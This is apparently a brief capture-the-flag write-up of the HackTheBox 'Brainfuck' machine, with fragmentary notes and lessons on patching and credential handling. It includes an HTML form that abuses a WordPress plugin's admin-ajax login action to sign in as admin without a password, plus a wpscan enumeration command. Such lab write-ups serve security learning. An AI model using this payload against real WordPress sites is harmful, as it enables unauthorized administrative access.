HackTheBox: Brainfuck Write-up #2

Reconnaissance

Enumeration

<form method="post" action="http://example.com/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="admin">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>
sudo wpscan --url https://www.brainfuck.htb --disable-tls-checks --enumerate

Exploitation

The IMAP ports must match our nmap scan results
The SMTP ports also have to be the same as in our nmap scan
P.S: it took me the whole day to get it :)
Private key content
Finally we are in the Goddamn box.
Finally we’re done
  1. WordPress was vulnerable because it was not kept on the updated product, which has been patched against many common vulnerabilities that have been found.
  2. The email credentials were saved inside the host facing the internet.
  3. Sharing of passwords (fixed, just in case they could be expiring ones) through emails as plaintext.
